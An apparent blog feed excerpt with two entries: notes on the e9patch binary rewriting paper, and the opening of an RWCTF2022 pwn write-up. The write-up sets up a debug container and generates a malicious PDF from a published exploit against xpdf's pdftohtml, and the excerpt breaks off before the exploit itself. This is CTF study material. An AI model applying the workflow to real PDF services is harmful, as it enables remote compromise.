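is transparent to the user, meaning that program behavior does not change through some side channel (such as timers or file descriptors).</li><li>The input binary itself does not use overlapping instructions or instruction punning.</li></ul><p>These assumptions are much weaker than the dependencies mentioned earlier on a compiler, a specific language or binary metadata; e9patch relies on none of those.</p><p>e9patch does not embed a disassembler. Instead, the user supplies instruction information for the target program (such as instruction offsets and sizes). This gives more flexibility: the user can perform <strong>partial instrumentation</strong> knowing only some of the instructions, which is more efficient, and e9patch is also easier to embed in other designs.</p><p>Next, the three new tactics e9patch provides. Consider an example based on the following instructions:</p><figure class="highlight x86asm"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="symbol">Ins1:</span> <span class="keyword">mov</span> %rax, (%<span class="built_in">rbx</span>)</span><br><span class="line"><span class="symbol">Ins2:</span> <span class="keyword">add</span> <span class="number">$32</span>, %rax</span><br><span class="line"><span class="symbol">Ins3:</span> <span class="keyword">xor</span> %rax, %rcx</span><br><span class="line"><span class="symbol">Ins4:</span> cmpl <span class="number">$77</span>, -<span class="number">4</span>(%<span class="built_in">rbx</span>)</span><br></pre></td></tr></table></figure><p>For ease of exposition, assume the following:</p><ol><li><p>The instruction to patch is Ins1.</p></li><li><p>Memory reached by a <strong>negative relative jump offset</strong> is invalid, that is, it cannot be allocated.</p><blockquote><p>Hence the instruction punning described above cannot be used here, because its relative jump offset is negative.</p></blockquote></li></ol><h3 id="T1-Padded-Jumps">T1: Padded Jumps</h3><p>A jmpq is normally encoded in 5 bytes: a 1-byte opcode and a 4-byte relative offset. It can, however, be encoded with more bytes by <strong>padding the jump with extra bytes in the form of redundant instruction prefixes</strong>.</p><p>x86_64 has several instruction prefixes that <strong>do not affect the semantics of a relative jump</strong>, such as REX prefixes, segment override prefixes (es, ss and so on) and the operand-size override prefix (0x66). In this example we can pad the jmpq with prefixes to shift the bytes of the relative offset toward higher addresses.</p><p><img src="/2022/02/e9patch/image-20220224115717750.png" alt="image-20220224115717750"></p><p>In the figure, T1(a) pads with one REX prefix (0x48), after which the jmpq offset has the form <code>0xc08348XX</code>. This offset is negative, so it cannot be used and more padding is needed.</p><p>e9patch then adds the es segment override prefix (0x26) on top of T1(a), giving T1(b). The relative offset of the jmpq in T1(b) is now 0x20c08348, which is no longer negative, so this 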
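jmpq can very likely reach memory that can be allocated.</p><p>This example shows the advantages, drawbacks and characteristics of tactic T1:</p><ul><li><p>Advantage: by writing a few extra instruction prefixes, new valid relative jump offsets can be found and used.</p></li><li><p>Drawback: the applicability of T1 depends on instruction length. The shorter the instruction, the fewer patch attempts T1 can make. This also means T1 cannot be applied to single-byte instructions.</p></li><li><p>Characteristic: each new patch attempt shrinks the address range available to the trampoline. For example:</p><ul><li>B2, usable relative offsets: <code>0x83480000~0x8348ffff</code> (range: 0x10000 offsets)</li><li>T1(a): <code>0xc0834800~0xc08348ff</code> (range: 0x100 offsets)</li><li>T1(b): <code>0x20c08348</code> (range: a single offset)</li></ul><p>I classify this as a characteristic rather than a drawback because e9patch only adds another prefix when the memory reachable with the current prefixes is unusable. An unusable range is of no help no matter how large it is.</p></li></ul><h3 id="T2-Successor-Eviction">T2: Successor Eviction</h3><p>What if, with T1, no amount of padding on Ins1 yields a usable jump offset? Could we modify the first few bytes of Ins2 to make patching Ins1 possible? This leads to another tactic, called successor eviction. The idea is:</p><ol><li><p>Evict the adjacent instruction Ins2 by replacing it with a jmpq.</p></li><li><p>This jmpq jumps to trampoline2, which executes the original Ins2 and then jumps back to continue with Ins3 and the instructions after it.</p></li></ol><blockquote><p>Note: the evicted instruction is called the victim.</p></blockquote><p>The semantics of Ins2 are unchanged: Ins2 is still executed, only now inside trampoline2 and with two extra jumps (to trampoline2 and back). But the bytes at Ins2's address really have changed. Ins1 can therefore try tactic T1 again and, once patched, jump to trampoline1 to do its own work.</p><blockquote><p>Note that the two trampolines are different.</p></blockquote><p><img src="/2022/02/e9patch/image-20220224115717750.png" alt="image-20220224115717750"></p><p>The whole idea can be condensed to:</p><blockquote><p>T1 is tried first and fails to patch Ins1. To change the bytes of Ins2 that Ins1 depends on, e9patch first patches Ins2 using T1. Once Ins2 is patched, it retries T1 on Ins1.</p></blockquote><p>The whole process still guarantees that:</p><ol><li>the semantics of Ins2 are the same as before</li><li>the program's set of jump targets is unchanged</li></ol><h3 id="T3-Neighbour-Eviction">T3: Neighbour Eviction</h3><p>What if the adjacent instruction cannot be used for patching and successor eviction does not work either?</p><ol><li><p>e9patch searches further forward (toward higher addresses) for a usable byte sequence to serve as the relative jump offset rel32.</p></li><li><p>Once found, it creates a jmpq in place at that location; this is T3(a).</p></li><li><p>It then patches the target instruction with a short relative jump to this new jmpq; this is T3(b).</p></li><li><p>The bytes of Ins3 were modified by the patch in step 2, so Ins3 must also be patched with a jmpq that jumps to a trampoline which executes Ins3.</p><p>This guarantees that, before and after the modification, Ins3 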
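keeps the same <strong>semantics</strong> (T3(c)).</p></li></ol><p><img src="/2022/02/e9patch/image-20220224115717750.png" alt="image-20220224115717750"></p><p>T3 is more complex but also more powerful; the key is the number of potential victims. Assuming an average instruction length of 4 bytes, a short jump can reach roughly 64 potential victims, so in most cases at least one suitable victim exists. This tactic raises patch coverage to nearly 100%.</p><p>An example of T3:</p><p><img src="/2022/02/e9patch/image-20220224144643001.png" alt="image-20220224144643001"></p><h3 id="S1-Reserve-Order-Patching">S1: Reverse Order Patching</h3><p>Everything above concerns patching a single instruction. In practice, users often need to <strong>patch several consecutive instructions</strong>.</p><blockquote><p>Patching several consecutive instructions here does <strong>not</strong> mean replacing the whole run with <strong>one</strong> trampoline jmp; it means patching <strong>each</strong> instruction in the run with its own trampoline jmp, giving <strong>several</strong> jumps.</p></blockquote><p>Let us look at this figure again:</p><p><img src="/2022/02/e9patch/image-20220224115717750.png" alt="image-20220224115717750"></p><p>Suppose the user wants to patch Ins1 into a jump to trampoline1 and Ins2 into a jump to trampoline2. If we patch Ins1 first (T1(b)), the resulting jump to trampoline1 <strong>depends on the bytes of Ins2</strong>, because the relative offset in the rel32 of Ins1's jmpq now overlaps the bytes of Ins2.</p><p>This dependency gets in the way of patching Ins2: if Ins1 is patched before Ins2, patching Ins2 may affect the already patched Ins1.</p><p>To manage multiple patch locations, e9patch therefore uses a <strong>reverse order patching strategy</strong>. The basic idea is to patch instructions in order <strong>from the highest address to the lowest</strong>, because <strong>instruction punning can only introduce dependencies on later instructions</strong>.</p><p>e9patch tracks the state of every byte of machine code, locked or unlocked, which can be stored in a bitmap. Consider a byte that:</p><ol><li><p><strong>has been modified by e9patch</strong></p></li><li><p><strong>is used as part of an instruction pun</strong></p></li></ol><p>Such a byte is considered locked.</p><p>Tactics T1 to T3 are subject to the following restrictions:</p><ol><li><p>A patch may not <strong>modify</strong> locked bytes (although it may still reuse or overlap them).</p></li><li><p>Only bytes after the current patch location are locked (to keep dependency management simple).</p><blockquote><p>This forces the rel8 of the short jump in T3 to be <strong>positive</strong>, halving the reachable range (and thus the number of instructions that can be evicted).</p><p>In practice, though, this restriction has little effect in the experiments.</p></blockquote></li></ol><h3 id="M1-Memory-and-File-Size-Management">M1: Memory and File Size Management</h3><p>Finally, consider where trampolines are placed in memory. As the tactics above show, trampoline addresses are constrained by the relative offsets produced by punning. For example:</p><ul><li><p>For T1(b), the trampoline address is 0x20c08348</p></li><li><p>For T3(b), 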
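the trampoline address is 0x4dfc7b83</p></li></ul><p>These addresses are very far apart, which hinders packing trampolines together and leads to high fragmentation and poor memory utilization. Scattered trampolines also greatly increase the space they take up in the ELF file.</p><p><img src="/2022/02/e9patch/image-20220224115717750.png" alt="image-20220224115717750"></p><p>An obvious way to mitigate this inefficiency is to <strong>place as many trampolines as possible in the same virtual page</strong>. In the worst case, however, each trampoline still ends up in a page of its own.</p><p>e9patch therefore also uses a mechanism called <code>Physical Page Grouping</code>:</p><blockquote><p>Try to gather <strong>trampolines that live in different virtual pages</strong> and <strong>store them in the same physical page</strong>.</p></blockquote><p><img src="/2022/02/e9patch/image-20220225110734939.png" alt="image-20220225110734939"></p><p>In the figure above, each physical page <code>P(a)</code> originally backs a single virtual page <code>V(a)</code>, which uses a lot of physical memory. After <code>Physical Page Grouping</code>, one physical page <code>P(b)</code> backs several virtual pages <code>V(b)</code>, which saves a great deal of physical memory.</p><blockquote><p>Note: a trampoline that straddles a page boundary is treated as two mini trampolines.</p></blockquote><p>The grouping from <code>V(a)</code> to <code>P(b)</code> is a partitioning algorithm. There are many possible implementations; e9patch uses the simplest one, a <strong>greedy algorithm</strong>, which performs reasonably well.</p><p>Physical Page Grouping has side effects of its own:</p><ol><li>Trampolines end up loaded at redundant memory locations where they are not used. Since these redundant trampolines are never executed, program behavior is unaffected.</li><li>The same physical memory is mapped into the virtual address space <strong>many</strong> times, and the number of mappings may exceed the default limit <code>vm.max_map_count = 65530</code>. There are two remedies:<ol><li>Raise the default mapping limit with sudo, which is not very practical.</li><li>Tune e9patch's <strong>granularity parameter M</strong> (the maximum number of physical pages used for grouping trampolines) to increase the number of physical pages P(b) used, thereby reducing the number of mappings per physical page. Typically, with M &gt;= 64, the <strong>number of physical page mappings</strong> for <strong>a single binary</strong> <strong>always stays below the default limit</strong>.</li></ol></li></ol><h2 id="四、实现">4. Implementation</h2><p>Inputs to e9patch:</p><ol><li>the unpatched binary</li><li>instruction information for the binary, including locations and sizes</li><li>the set of instruction locations to patch</li><li>the set of trampolines</li></ol><p>Output: a patched program produced with the tactics above. The rewritten binary is a <strong>drop-in replacement</strong> for the original and needs no extra dependencies.</p><p>Two implementation points are worth noting:</p><ol><li>New trampolines are <strong>appended to the end of the ELF file</strong>, so existing data and code are not moved and complex changes to the ELF headers are avoided.</li><li>The new physical pages holding the trampolines <strong>must be mapped into the program's virtual address space at load time</strong>. In the implementation, e9patch integrates a mini 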
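loader into the output binary and replaces the entry point with the mini loader's entry point. After the virtual pages for the trampolines have been mapped, control is returned to the real entry point.</li></ol><p>e9patch supports both PIE and non-PIE binaries. <strong>PIE programs are easier to patch than non-PIE ones</strong>, because PIE code is usually loaded at high addresses, whereas non-PIE code is loaded at low addresses, closer to NULL.</p><p>Some situations limit the use of e9patch:</p><ul><li><p>L1: shortage of virtual memory. Programs with very large code or data segments may restrict the space available for trampolines: the jmpq offset is 32 bits, so if the code and data segments are too large, a jump may be unable to reach the heap area.</p></li><li><p>L2: single-byte instructions. e9patch cannot patch single-byte instructions, which affects instructions such as push, pop and ret.</p></li><li><p>L3: patching a very large number of instructions. Patching a great many instructions may reduce patch coverage because of byte dependencies.</p></li></ul><p>In addition, e9patch cannot handle inline data, that is, data embedded within code.</p><p>In general, though, L1 does not apply to most programs, and L2 and L3 are irrelevant to many programs as well.</p><h2 id="五、评估">5. Evaluation</h2><p>The evaluation uses the following metrics:</p><ul><li>patching time</li><li>patch coverage</li><li>size of the patched binary</li><li>scalability of the e9patch prototype</li></ul><p>e9patch can be applied to binary hardening, instrumentation, repair and more. In the evaluation, e9patch patches two kinds of instructions:</p><ol><li><p>All jmp/jcc jump instructions</p><p>This roughly simulates coverage instrumentation. By design e9patch has no basic-block information, so it simply patches every jmp instruction.</p></li><li><p>All instructions that may write through heap pointers</p><p>This simulates binary hardening, where instructions that write through heap pointers are patched.</p></li></ol><p>Every patched instruction is redirected to an empty trampoline that does nothing except execute the original instruction. The results:</p><blockquote><p>#Loc: total number of patch locations</p><p>Base%: coverage with the B1+B2 tactics</p><p>Succ%: overall patch coverage</p></blockquote><p><img src="/2022/02/e9patch/image-20220225171251837.png" alt="image-20220225171251837"></p><p>The figure shows that:</p><ul><li><p>e9patch achieves very high coverage, close to 100%.</p></li><li><p>Where baseline coverage is low, tactics T1 to T3 raise it dramatically.</p><p>T3 deserves particular mention: it has high coverage on its own and can patch instructions that the other tactics cannot.</p></li><li><p>For every tactic, coverage on PIE programs is much higher than on the corresponding non-PIE programs.</p></li><li><p>gamess and zeusmp fall short of 100% because both allocate a very large .bss section (which is exactly limitation L1). When compiled as PIE, both reach 100% coverage.</p></li><li><p>With physical page grouping, file size grows by +57% / +30% respectively, which is acceptable.</p><p>Without it, the growth is +2239.83% / +568.96% respectively, which is clearly unacceptable.</p></li></ul><p>Next is the <strong>scalability test</strong>, using the large programs chrome and firefox:</p><blockquote><p>Most of firefox's code is placed in the <code>libxul.so</code> 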
shared object.</p></blockquote><p><img src="/2022/02/e9patch/image-20220225212346125.png" alt="image-20220225212346125"></p><p>The benchmarks were chosen to <strong>minimize the time spent executing JIT-compiled JavaScript</strong>, because e9patch cannot patch JIT code.</p><p>chrome incurs about +113% overhead and firefox about +46%. One possible reason for firefox's lower overhead is that it spends more time executing JIT code or shared objects that were not instrumented.</p><p>This shows that e9patch scales easily to binaries hundreds of megabytes in size.</p><p>Finally, e9patch applied to binary hardening. First, a brief introduction to the hardening technique used in the test: LowFat pointers. The basic idea is to divide the program's virtual address space into several large regions, each responsible for allocating objects of a given fixed size range:</p><p><img src="/2022/02/e9patch/layout.png" alt="LowFat memory layout"></p><ul><li><p>The first region contains the program's text, data, bss and other segments as usual.</p></li><li><p>The following regions are used for LowFat pointer allocation. For example:</p><ul><li><p>Region #1 serves allocations of 1-16 bytes</p></li><li><p>Region #2 serves allocations of 17-32 bytes</p></li><li><p>and so on</p></li></ul><p>In addition, every object allocated by LowFat is <strong>aligned to its allocation size</strong>. The value of any LowFat pointer can therefore be used to compute the memory bounds of the object.</p></li></ul><p>A simple example:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">p = <span class="built_in">malloc</span>(<span class="number">10</span>); <span class="comment">// p = 0x8997f2820</span></span><br></pre></td></tr></table></figure><p>Because the value of p lies in <code>0x800000000~0x1000000000</code>, we know that the memory p points to is 16 bytes in size (note the alignment).</p><p>For a memory access through <code>q = 0x8997f2825</code>:</p><ol><li>q lies in the range <code>0x800000000~0x1000000000</code>, so the object size is 16 bytes.</li><li>Rounding q <strong>down to a multiple of the object size</strong> gives the address 0x8997f2820, which is the base address of the object.</li></ol><p>Now instrument the following function:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">char</span> <span class="title">get</span><span class="params">(<span class="type">char</span> *q, <span class="type">int</span> 
i)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="keyword">return</span> q[i];</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>The instrumented function, which detects OOB accesses, looks like this:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">char</span> <span class="title">get</span><span class="params">(<span class="type">char</span> *q, <span class="type">int</span> i)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="type">char</span> *q_base = <span class="built_in">base</span>(q);</span><br><span class="line">    <span class="type">size_t</span> q_size = <span class="built_in">size</span>(q);</span><br><span class="line">    <span class="type">char</span> *r = q + i;</span><br><span class="line">    <span class="keyword">if</span> (r &lt; q_base || r &gt;= q_base + q_size)</span><br><span class="line">        <span class="built_in">report_oob_error</span>();</span><br><span class="line">    <span class="keyword">return</span> *r;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>The figure below shows the experimental results of applying a LowFat variant with e9patch:</p><p><img src="/2022/02/e9patch/image-20220225215921164.png" alt="image-20220225215921164"></p><p>The lowfat project itself only works for C/C++, whereas e9patch can be applied to binaries written in any language, which makes e9patch quite powerful.</p>]]></content>
    
    
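    <summary type="html">&lt;h2 id=&quot;一、概述&quot;&gt;I. Overview&lt;/h2&gt;
&lt;p&gt;Binary rewriting is useful in many scenarios, such as repair, hardening, instrumentation, patching and debugging. Most binary rewriting techniques depend on &lt;strong&gt;recovering control flow information&lt;/strong&gt; from the input binary: they usually move instructions around, so the relative offsets of other jump instructions must be adjusted, i.e. the &lt;strong&gt;set of jump targets&lt;/strong&gt; must be fixed up.&lt;/p&gt;
&lt;p&gt;The problem is that &lt;strong&gt;recovering control flow information from a binary is very hard&lt;/strong&gt;:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;One approach &lt;strong&gt;relies on specific binary metadata&lt;/strong&gt;, such as debug symbols, to recover relocation information, but not every binary carries such metadata (it may have been stripped).&lt;/li&gt;
&lt;li&gt;Another approach &lt;strong&gt;uses static binary analysis&lt;/strong&gt;, but it usually works poorly and does not scale to large binaries.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;As a result, most binary rewriting techniques rely on one or more sets of assumptions, such as a particular compiler or a particular programming language. This limits them: they are hard to extend and cannot handle large programs such as chrome.&lt;/p&gt;
&lt;p&gt;This paper presents a binary rewriting technique for &lt;strong&gt;x86_64&lt;/strong&gt; called e9patch, where &lt;code&gt;e9&lt;/code&gt; is the opcode of &lt;code&gt;jmpq rel32&lt;/code&gt;: 0xe9. Its key advantage is that it is &lt;strong&gt;control flow agnostic&lt;/strong&gt;, i.e. it &lt;strong&gt;requires no knowledge of control flow&lt;/strong&gt;. The rewriting method preserves the set of jump targets, so no control flow recovery is needed. The tool is therefore quite robust and can patch binaries larger than 100MB, such as chrome.&lt;/p&gt;
&lt;p&gt;Besides ordinary executables, e9patch can also patch shared objects or libraries.&lt;/p&gt;</summary>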
    
    
    
    <category term="论文阅读" scheme="https://kiprey.github.io/categories/%E8%AE%BA%E6%96%87%E9%98%85%E8%AF%BB/"/>
    
    
    <category term="binary rewriting" scheme="https://kiprey.github.io/tags/binary-rewriting/"/>
    
  </entry>
  
  <entry>
    <title>RWCTF2022 Pwn Notes 3 - hso groupie Writeup</title>
    <link href="https://kiprey.github.io/2022/02/rwctf2022_hso/"/>
    <id>https://kiprey.github.io/2022/02/rwctf2022_hso/</id>
    <published>2022-02-01T16:00:00.000Z</published>
    <updated>2025-11-24T03:59:40.094Z</updated>
    
    <content type="html"><![CDATA[<h2 id="简介">Introduction</h2><p>These are notes written while revisiting the <code>hso groupie</code> challenge from RWCTF2022. The challenge is based on Project Zero's article <strong>A deep dive into an NSO zero-click iMessage exploit: Remote Code Execution</strong>.</p><p>The overall approach is derived mainly from Riatre's exploit. In other words, these notes are largely an explanation of <a href="https://github.com/Riatre/hso-groupie/tree/master/exploit">the author's exploit</a>.</p><p>Because this challenge is also fairly complex, it gets a post of its own.</p><blockquote><p>Co-author: sakura</p></blockquote><!-- more --><h2 id="一、小叙">I. Brief Background</h2><figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">Help check how secure our latest PaaS (Pdftohtml-as-a-Service) is!</span><br><span class="line">Pick your favorite bug from this bloody list, or really, just exploit that bug so your exploit would also work on latest Poppler [1] and maybe even KItinerary.</span><br><span class="line">The container image is also available on Docker Hub.</span><br><span class="line">[1] Yeah, turns out propagating bug fixes between different Clone-and-Own codebases takes time :)</span><br><span class="line">socat -t90 stdio tcp-connect:47.242.147.191:31337</span><br><span class="line">attachment</span><br><span class="line"></span><br><span class="line">Clone-and-Pwn, difficulty:hard</span><br></pre></td></tr></table></figure><p>This is a clone-and-pwn challenge: the source code is unmodified, and the task is to find and exploit a vulnerability by looking through recently committed bug fixes.</p><h2 id="二、环境搭建">II. Environment Setup</h2><h3 id="1-本地环境搭建">1. 
Local Environment Setup</h3><blockquote><p>The challenge binary was built on debian, so on some debian systems the exp runs as-is (mine, for example XD).</p></blockquote><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">wget https://dl.xpdfreader.com/xpdf-4.03.tar.gz</span><br><span class="line">tar -zxvf xpdf-4.03.tar.gz</span><br><span class="line"><span class="built_in">cd</span> xpdf-4.03</span><br><span class="line"><span class="built_in">mkdir</span> build</span><br><span class="line"><span class="built_in">cd</span> build</span><br><span class="line">cmake -DCMAKE_BUILD_TYPE=Debug -DCMAKE_CXX_FLAGS=<span class="string">&quot;-D_FORTIFY_SOURCE=2 -fstack-protector-strong -Wl,-z,now -Wl,-z,relro -g3 -ggdb3 -O0&quot;</span> ..</span><br><span class="line">make -j `<span class="built_in">nproc</span>` </span><br><span class="line"></span><br><span class="line"><span class="comment"># The challenge also ships a glibc attachment: `GNU C Library (Debian GLIBC 2.33-2) release`</span></span><br><span class="line">patchelf --replace-needed libc.so.6 <span class="variable">$&#123;PWD&#125;</span>/../../libc.so.6 ./xpdf/pdftohtml</span><br></pre></td></tr></table></figure><p>How to run:</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">xpdf/pdftohtml &lt;pdf-path&gt; --</span><br></pre></td></tr></table></figure><h3 id="2-exploit-调试环境搭建">2. 
Exploit Debugging Environment Setup</h3><p>Download the dockerfile and the rest of the challenge environment from the <a href="https://github.com/Riatre/hso-groupie/tree/master/chall">challenge repository</a>, then apply this patch to the dockerfile:</p><figure class="highlight diff"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">--- a/Dockerfile</span></span><br><span class="line"><span class="comment">+++ b/Dockerfile</span></span><br><span class="line"><span class="meta">@@ -8,7 +8,7 @@</span> RUN cd /tmp/xpdf-4.03 &amp;&amp; \</span><br><span class="line">     mkdir build &amp;&amp; \</span><br><span class="line">     cd build &amp;&amp; \</span><br><span class="line">     cmake -DCMAKE_BUILD_TYPE=Release \</span><br><span class="line"><span class="deletion">-        -DCMAKE_CXX_FLAGS=&quot;-D_FORTIFY_SOURCE=2 -fstack-protector-strong -Wl,-z,now -Wl,-z,relro&quot; .. &amp;&amp; \</span></span><br><span class="line"><span class="addition">+        -DCMAKE_CXX_FLAGS=&quot;-D_FORTIFY_SOURCE=2 -fstack-protector-strong -Wl,-z,now -Wl,-z,relro -g3 -ggdb3 -O0 &quot; .. 
&amp;&amp; \</span></span><br><span class="line">     make -j$(nproc)</span><br><span class="line"></span><br><span class="line"> FROM debian:unstable-20211220-slim</span><br><span class="line"><span class="meta">@@ -20,6 +20,7 @@</span> RUN echo &quot;deb [check-valid-until=no] http://snapshot.debian.org/archive/debian/2</span><br><span class="line">     apt-get install -y fonts-arkpandora fonts-noto fonts-dejavu fonts-font-awesome fonts-lato fonts-powerline gsfonts &amp;&amp; \</span><br><span class="line">     apt-get clean &amp;&amp; rm -rf /var/lib/apt/lists/*</span><br><span class="line"> COPY --from=build /tmp/xpdf-4.03/build/xpdf/pdftohtml /usr/local/bin/</span><br><span class="line"><span class="addition">+COPY gdbserver /usr/bin/gdbserver</span></span><br><span class="line"> RUN mkdir -p /run/secrets &amp;&amp; echo &#x27;rwctf&#123;flag placeholder&#125;&#x27; &gt; /run/secrets/flag</span><br><span class="line"></span><br><span class="line"><span class="deletion">-ENTRYPOINT [ &quot;/bin/sh&quot;, &quot;-c&quot;, &quot;/usr/local/bin/pdftohtml \&quot;$@\&quot;&quot;, &quot;--&quot; ]</span></span><br><span class="line">\ No newline at end of file</span><br><span class="line"><span class="addition">+ENTRYPOINT [ &quot;/bin/sh&quot;]</span></span><br><span class="line">\ No newline at end of file</span><br></pre></td></tr></table></figure><p>The patch puts gdbserver into the image and makes the entry point stop at <code>/bin/sh</code> instead of launching pdftohtml directly.</p><blockquote><p>Note the source path of the COPY command: a relative path is used here, so the gdbserver binary must be present in the build context.</p></blockquote><p>Run <code>build.sh</code>. When it finishes, check the image:</p><figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">➜  chall git:(master) docker image ls         </span><br><span class="line">REPOSITORY             TAG                      IMAGE ID       CREATED             SIZE</span><br><span class="line">hsogroupie/pdftohtml   latest           
        042e72a0f133   45 minutes ago      946MB</span><br></pre></td></tr></table></figure><p>Start a container from the image:</p><figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">docker run -itd -p 1234:1234 -v sakura_volume:/tmp/chall --cap-add=SYS_PTRACE --security-opt seccomp=unconfined --name hsogroupie hsogroupie/pdftohtml</span><br></pre></td></tr></table></figure><p>The command is long, so here is a breakdown:</p><figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">docker run --help</span><br><span class="line"></span><br><span class="line">-i : keep STDIN open (interactive mode)</span><br><span class="line">-t : allocate a pseudo-TTY</span><br><span class="line">-d : run the container in the background (detached)</span><br><span class="line">-p : host port:container port; publishes the container port on the host. Using 1234 for both is fine here</span><br><span class="line">-v : mount a volume</span><br><span class="line">--cap-add=SYS_PTRACE --security-opt seccomp=unconfined : Docker restricts ptrace by default, so these options are required</span><br><span class="line">--name : assign a name to the container</span><br></pre></td></tr></table></figure><p>Mounting the volume needs some extra explanation (see <a href="https://www.cnblogs.com/edisonchou/p/docker_volumes_introduction.html">this article</a>):</p><figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span 
class="line">15</span><br></pre></td><td class="code"><pre><span class="line">docker volume create sakura_volume # create a named volume</span><br><span class="line">docker volume ls # list all volumes</span><br><span class="line">docker volume inspect sakura_volume # show details of the given volume</span><br><span class="line">...</span><br><span class="line">[</span><br><span class="line">    &#123;</span><br><span class="line">        &quot;CreatedAt&quot;: &quot;2022-02-02T01:29:55+08:00&quot;,</span><br><span class="line">        &quot;Driver&quot;: &quot;local&quot;,</span><br><span class="line">        &quot;Labels&quot;: &#123;&#125;,</span><br><span class="line">        &quot;Mountpoint&quot;: &quot;/var/lib/docker/volumes/sakura_volume/_data&quot;,</span><br><span class="line">        &quot;Name&quot;: &quot;sakura_volume&quot;,</span><br><span class="line">        &quot;Options&quot;: &#123;&#125;,</span><br><span class="line">        &quot;Scope&quot;: &quot;local&quot;</span><br><span class="line">    &#125;</span><br><span class="line">]</span><br></pre></td></tr></table></figure><p>Any change made under <code>/var/lib/docker/volumes/sakura_volume/_data</code> then shows up in the container's <code>/tmp/chall</code>, which makes transferring files easy.</p><p>Once the container is up, run <code>docker ps</code> to check that everything is fine:</p><figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">➜  chall git:(master) docker ps -a                     </span><br><span class="line">CONTAINER ID   IMAGE                  COMMAND     CREATED          STATUS          PORTS                                       NAMES</span><br><span class="line">15f265c337c0   hsogroupie/pdftohtml   &quot;/bin/sh&quot;   34 minutes ago   Up 34 minutes   0.0.0.0:1234-&gt;1234/tcp, :::1234-&gt;1234/tcp   hsogroupie</span><br></pre></td></tr></table></figure><p>Generate the exp pdf. Remember to initialize the submodule, otherwise the jbig2enc library will be missing:</p><figure class="highlight text"><table><tr><td 
class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">git clone https://github.com/Riatre/hso-groupie.git</span><br><span class="line">cd hso-groupie/exploit</span><br><span class="line">git submodule update --init</span><br><span class="line">cd ..</span><br><span class="line">sudo cp -r exploit /var/lib/docker/volumes/sakura_volume/_data</span><br></pre></td></tr></table></figure><p>Then, inside the docker container, go to the exploit directory on the mounted volume. The following packages should be needed; install anything else that turns out to be missing:</p><figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">apt-get update</span><br><span class="line">apt-get install make g++ python3 pybind11-dev python3-dev python2 python2-dev</span><br><span class="line">make</span><br><span class="line">...</span><br><span class="line">...</span><br><span class="line">root@15f265c337c0:/tmp/chall/exploit# make</span><br><span class="line">g++ -O3 -std=c++20 -shared -fPIC jbig2arith.cc jbig2arith.h jbjbarith.cc jbjbarith.h -ojbjbarith.cpython-39-x86_64-linux-gnu.so -I/usr/include/python3.9 -I/usr/include/python3.9</span><br><span class="line">python3 sploit.py</span><br><span class="line">python2 pdf.py sploit &gt; sploit.pdf</span><br></pre></td></tr></table></figure><p>Debugging the exp:</p><figure class="highlight 